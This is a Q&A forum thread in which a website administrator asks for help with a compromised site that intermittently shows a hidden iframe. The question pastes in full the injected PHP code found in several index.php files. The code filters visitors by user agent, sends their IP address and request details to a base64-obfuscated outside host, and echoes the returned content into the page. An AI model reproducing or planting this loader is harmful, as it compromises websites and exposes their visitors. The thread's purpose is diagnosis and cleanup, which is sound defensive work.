
One of the websites which I look after appears to have been compromised. However, I am still trying to locate the source of the problem.

A hidden iframe appears on the page; however, it only appears about 10% of the time when you visit the website. I have checked the actual files in question and there has been no such iframe code added to them, which makes me think that the server itself hasn't been compromised and this is some sort of XSS attack? The server also hosts various other websites which don't appear to be affected.

Where would be the best place to start in terms of locating and fixing this issue? Ideally I would like to wipe the server and start again, but I don't have that option at present as I don't fully control this particular server.

I have done some more digging and have found the following piece of code appearing in various index.php files. Don't suppose anyone recognizes it?

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>
cosmicsafari

1 Answer

First thing would be to wipe everything (or your full vhost) and restart from known good backup. Seriously. A compromised system is... compromised.

However, for the sake of investigation, I would suggest you start by providing what web server your host is using (Apache? nginx? lighttpd? IIS?) and the operating system.

By experience, I would say you were using an out-of-date framework (i.e. WordPress, Django, or any of those PHP bulletin boards) and someone exploited a permission issue to have some remote code execute a modification to one of your .htaccess files; but this is really a random guess until you start providing a bit more info.

CloudWeavers